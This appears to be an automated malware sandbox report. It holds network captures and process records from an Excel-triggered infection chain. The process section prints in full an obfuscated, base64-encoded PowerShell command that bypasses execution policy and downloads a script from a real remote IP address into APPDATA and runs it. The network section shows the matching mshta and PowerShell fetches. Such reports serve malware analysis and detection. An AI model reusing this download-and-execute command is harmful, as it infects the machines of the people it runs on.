                                                      2024-08-28 04:56:42 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                      Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.224917188.99.66.384433528C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-28 04:56:47 UTC321OUTGET /pitash HTTP/1.1
                                                      Accept: */*
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: zhort.de
                                                      Connection: Keep-Alive
                                                      2024-08-28 04:56:47 UTC469INHTTP/1.1 302 Found
                                                      Server: openresty
                                                      Date: Wed, 28 Aug 2024 04:56:47 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 80
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 0
                                                      Location: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta
                                                      Vary: Accept
                                                      X-Served-By: zhort.de
                                                      2024-08-28 04:56:47 UTC80INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 39 33 2e 31 35 35 2f 78 61 6d 70 70 2f 62 6f 7a 2f 62 7a 2f 49 45 6e 65 74 77 6f 72 6b 72 6f 75 6e 64 74 68 69 6e 67 73 2e 68 74 61
                                                      Data Ascii: Found. Redirecting to http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.224917488.99.66.384431960C:\Windows\System32\mshta.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-28 04:56:49 UTC345OUTGET /pitash HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: zhort.de
                                                      Connection: Keep-Alive
                                                      2024-08-28 04:56:50 UTC469INHTTP/1.1 302 Found
                                                      Server: openresty
                                                      Date: Wed, 28 Aug 2024 04:56:50 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 80
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 0
                                                      Location: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta
                                                      Vary: Accept
                                                      X-Served-By: zhort.de
                                                      2024-08-28 04:56:50 UTC80INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 39 33 2e 31 35 35 2f 78 61 6d 70 70 2f 62 6f 7a 2f 62 7a 2f 49 45 6e 65 74 77 6f 72 6b 72 6f 75 6e 64 74 68 69 6e 67 73 2e 68 74 61
                                                      Data Ascii: Found. Redirecting to http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.2249176207.241.232.1544434016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-28 04:57:01 UTC111OUTGET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                                                      Host: ia803104.us.archive.org
                                                      Connection: Keep-Alive
                                                      2024-08-28 04:57:01 UTC591INHTTP/1.1 200 OK
                                                      Server: nginx/1.24.0 (Ubuntu)
                                                      Date: Wed, 28 Aug 2024 04:57:01 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 1931225
                                                      Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
                                                      Connection: close
                                                      ETag: "66a41ab4-1d77d9"
                                                      Strict-Transport-Security: max-age=15724800
                                                      Expires: Wed, 28 Aug 2024 10:57:01 GMT
                                                      Cache-Control: max-age=21600
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                      Access-Control-Allow-Credentials: true
                                                      Accept-Ranges: bytes
                                                      2024-08-28 04:57:01 UTC15793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                      Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                      2024-08-28 04:57:01 UTC16384INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                      Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                                      2024-08-28 04:57:01 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                      Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                                      2024-08-28 04:57:01 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                                      Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                                      2024-08-28 04:57:01 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                      Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                                      2024-08-28 04:57:01 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                      Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                      2024-08-28 04:57:01 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                      Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                      2024-08-28 04:57:01 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                      Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
                                                      2024-08-28 04:57:01 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                      Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                      2024-08-28 04:57:01 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                      Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:00:56:05
                                                      Start date:28/08/2024
                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                      Imagebase:0x13f830000
                                                      File size:28'253'536 bytes
                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:4
                                                      Start time:00:56:27
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\mshta.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                      Imagebase:0x13f7e0000
                                                      File size:13'824 bytes
                                                      MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:00:56:30
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                                                      Imagebase:0x4a7d0000
                                                      File size:345'088 bytes
                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:00:56:30
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                                                      Imagebase:0x13f030000
                                                      File size:443'392 bytes
                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:00:56:34
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline"
                                                      Imagebase:0x13ffb0000
                                                      File size:2'758'280 bytes
                                                      MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:00:56:34
                                                      Start date:28/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      Wow64 process (32bit):false
